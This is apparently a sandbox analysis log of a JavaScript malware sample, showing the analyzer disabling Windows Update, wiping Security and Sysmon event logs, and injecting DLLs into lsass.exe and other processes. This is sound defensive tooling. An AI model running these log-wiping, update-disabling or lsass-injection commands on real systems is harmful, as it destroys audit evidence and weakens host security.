Analysis
| Category | Package | Started | Completed | Duration | Options | Log(s) | MalScore |
|---|---|---|---|---|---|---|---|
| FILE | js | 2025-12-08 16:32:32 | 2025-12-08 16:35:55 | 203 seconds | Show Options | Show Analysis Log | 4.4 |
vnc_port=5902
2025-12-06 09:30:10,735 [root] INFO: Date set to: 20251208T08:31:09, timeout set to: 180
2025-12-08 08:31:09,000 [root] DEBUG: Starting analyzer from: C:\tmpxury4kjh
2025-12-08 08:31:09,000 [root] DEBUG: Storing results at: C:\izVIbM
2025-12-08 08:31:09,000 [root] DEBUG: Pipe server name: \\.\PIPE\kpRijuZscx
2025-12-08 08:31:09,000 [root] DEBUG: Python path: C:\Python38
2025-12-08 08:31:09,000 [root] INFO: analysis running as an admin
2025-12-08 08:31:09,000 [root] INFO: analysis package specified: "js"
2025-12-08 08:31:09,000 [root] DEBUG: importing analysis package module: "modules.packages.js"...
2025-12-08 08:31:09,015 [root] DEBUG: imported analysis package "js"
2025-12-08 08:31:09,015 [root] DEBUG: initializing analysis package "js"...
2025-12-08 08:31:09,015 [lib.common.common] INFO: wrapping
2025-12-08 08:31:09,015 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:09,015 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\testjs.js
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a DLL option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a DLL_64 option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a loader option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a loader_64 option
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-08 08:31:09,062 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 08:31:09,093 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-08 08:31:09,093 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 08:31:09,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-08 08:31:09,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-08 08:31:09,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-08 08:31:09,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-08 08:31:09,281 [modules.auxiliary.disguise] INFO: Disguising GUID to 4cd86de3-d3ab-4183-8f30-4cb63b155e73
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-08 08:31:09,281 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-08 08:31:09,281 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-08 08:31:09,281 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Human' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 08:31:09,375 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-08 08:31:09,421 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-08 08:31:09,421 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-08 08:31:09,421 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-08 08:31:09,421 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-08 08:31:09,421 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-08 08:31:09,421 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-08 08:31:09,421 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 392
2025-12-08 08:31:09,421 [lib.api.process] INFO: Monitor config for <Process 392 lsass.exe>: C:\tmpxury4kjh\dll\392.ini
2025-12-08 08:31:09,421 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-08 08:31:09,421 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:09,437 [root] DEBUG: Loader: Injecting process 392 with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:09,453 [root] DEBUG: 392: Python path set to 'C:\Python38'.
2025-12-08 08:31:09,453 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:09,468 [root] DEBUG: 392: TLS secret dump mode enabled.
2025-12-08 08:31:09,468 [root] DEBUG: 392: Monitor initialised: 32-bit capemon loaded in process 392 at 0x6c9a0000, thread 3136, image base 0x570000, stack from 0x1066000-0x1070000
2025-12-08 08:31:09,468 [root] DEBUG: 392: Commandline: C:\Windows\system32\lsass.exe
2025-12-08 08:31:09,468 [root] DEBUG: 392: Hooked 5 out of 5 functions
2025-12-08 08:31:09,468 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:09,468 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-08 08:31:09,468 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:09,484 [lib.api.process] INFO: Injected into 32-bit <Process 392 lsass.exe>
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-08 08:31:09,484 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-08 08:31:09,484 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-08 08:31:09,484 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-08 08:31:09,484 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-08 08:31:09,484 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-08 08:31:09,484 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-08 08:31:09,484 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-08 08:31:09,484 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-08 08:31:09,484 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-08 08:31:09,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-08 08:31:09,531 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-08 08:31:09,562 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-08 08:31:09,562 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-08 08:31:09,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-08 08:31:09,593 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-08 08:31:09,609 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-08 08:31:09,625 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-08 08:31:09,640 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-08 08:31:09,640 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-08 08:31:09,656 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-08 08:31:09,687 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-08 08:31:09,703 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-08 08:31:09,703 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-08 08:31:09,718 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-08 08:31:09,718 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-08 08:31:09,734 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-08 08:31:09,750 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-08 08:31:09,765 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-08 08:31:09,781 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-08 08:31:09,796 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-08 08:31:09,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-08 08:31:09,828 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-08 08:31:09,843 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-08 08:31:09,859 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-08 08:31:09,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-08 08:31:09,890 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-08 08:31:09,906 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:09,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:09,937 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-08 08:31:09,953 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-08 08:31:09,968 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-08 08:31:09,984 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-08 08:31:10,000 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-08 08:31:10,015 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-08 08:31:10,031 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-08 08:31:10,046 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-08 08:31:10,062 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-08 08:31:10,078 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,109 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,125 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-08 08:31:10,140 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-08 08:31:10,156 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-08 08:31:10,171 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-08 08:31:10,187 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-08 08:31:10,203 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-08 08:31:10,218 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-08 08:31:10,234 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-08 08:31:10,249 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-08 08:31:10,265 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-08 08:31:10,281 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-08 08:31:10,296 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-08 08:31:10,312 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-08 08:31:10,312 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-08 08:31:10,328 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-08 08:31:10,343 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-08 08:31:10,359 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-08 08:31:10,375 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-08 08:31:10,390 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-08 08:31:14,656 [root] INFO: Restarting WMI Service
2025-12-08 08:31:16,687 [root] DEBUG: package modules.packages.js does not support configure, ignoring
2025-12-08 08:31:16,687 [root] WARNING: configuration error for package modules.packages.js: error importing data.packages.js: No module named 'data.packages'
2025-12-08 08:31:16,687 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:16,687 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\wscript.exe" with arguments ""C:\Users\user\AppData\Local\Temp\testjs.js"" with pid 3016
2025-12-08 08:31:16,687 [lib.api.process] INFO: Monitor config for <Process 3016 wscript.exe>: C:\tmpxury4kjh\dll\3016.ini
2025-12-08 08:31:16,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:16,703 [root] DEBUG: Loader: Injecting process 3016 (thread 3052) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:16,703 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:31:16,703 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:16,703 [lib.api.process] INFO: Injected into 32-bit <Process 3016 wscript.exe>
2025-12-08 08:31:18,703 [lib.api.process] INFO: Successfully resumed <Process 3016 wscript.exe>
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Python path set to 'C:\Python38'.
2025-12-08 08:31:18,703 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Dropped file limit defaulting to 100.
2025-12-08 08:31:18,703 [root] DEBUG: 3016: wscript hook set enabled
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraInit: Compiled 41 rule files
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraInit: Compiled rules saved to file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraScan: Scanning 0x002E0000, size 0x253d4
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Monitor initialised: 32-bit capemon loaded in process 3016 at 0x6c9a0000, thread 3052, image base 0x2e0000, stack from 0x206000-0x210000
2025-12-08 08:31:18,718 [root] DEBUG: 3016: Commandline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Local\Temp\testjs.js"
2025-12-08 08:31:18,718 [root] DEBUG: 3016: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:31:18,718 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:31:18,718 [root] DEBUG: 3016: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:31:18,718 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:31:18,718 [root] DEBUG: 3016: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:31:18,718 [root] DEBUG: 3016: Hooked 611 out of 613 functions
2025-12-08 08:31:18,718 [root] DEBUG: 3016: WoW64 not detected.
2025-12-08 08:31:18,734 [root] INFO: Loaded monitor into process with pid 3016
2025-12-08 08:31:18,734 [root] DEBUG: 3016: caller_dispatch: Added region at 0x002E0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x002E3DA7, thread 3052).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: YaraScan: Scanning 0x002E0000, size 0x253d4
2025-12-08 08:31:18,734 [root] DEBUG: 3016: ProcessImageBase: Main module image at 0x002E0000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x753F0000: C:\Windows\system32\SXS (0x5f000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x73E80000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 08:31:18,750 [root] DEBUG: 3016: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:31:18,750 [root] DEBUG: 3016: DLL loaded at 0x6CC90000: C:\Windows\System32\jscript (0xa6000 bytes).
2025-12-08 08:31:18,750 [lib.api.process] INFO: Monitor config for <Process 556 svchost.exe>: C:\tmpxury4kjh\dll\556.ini
2025-12-08 08:31:18,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:18,750 [root] DEBUG: Loader: Injecting process 556 with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:18,765 [root] DEBUG: 556: Python path set to 'C:\Python38'.
2025-12-08 08:31:18,765 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:18,765 [root] DEBUG: 556: Dropped file limit defaulting to 100.
2025-12-08 08:31:18,765 [root] DEBUG: 556: parent_has_path: unable to get path for parent process 376
2025-12-08 08:31:18,765 [root] DEBUG: 556: YaraInit: Compiled rules loaded from existing file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:31:18,765 [root] DEBUG: 556: YaraScan: Scanning 0x00F00000, size 0x73ca
2025-12-08 08:31:18,765 [root] DEBUG: 556: Monitor initialised: 32-bit capemon loaded in process 556 at 0x6c9a0000, thread 3376, image base 0xf00000, stack from 0xc36000-0xc40000
2025-12-08 08:31:18,765 [root] DEBUG: 556: Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch
2025-12-08 08:31:18,765 [root] DEBUG: 556: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:31:18,765 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:31:18,765 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:31:18,781 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:31:18,781 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:31:18,781 [root] DEBUG: 556: Hooked 611 out of 613 functions
2025-12-08 08:31:18,781 [root] DEBUG: 556: WoW64 not detected.
2025-12-08 08:31:18,781 [root] INFO: Loaded monitor into process with pid 556
2025-12-08 08:31:18,781 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:18,781 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:18,781 [lib.api.process] INFO: Injected into 32-bit <Process 556 svchost.exe>
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x75630000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x73AC0000: C:\Windows\system32\MSISIP (0x8000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x72740000: C:\Windows\system32\wshext (0x16000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x721D0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x71CF0000: C:\Windows\system32\scrobj (0x2d000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:31:20,890 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3592, handle 0x5f8: C:\Windows\System32\audiodg.exe
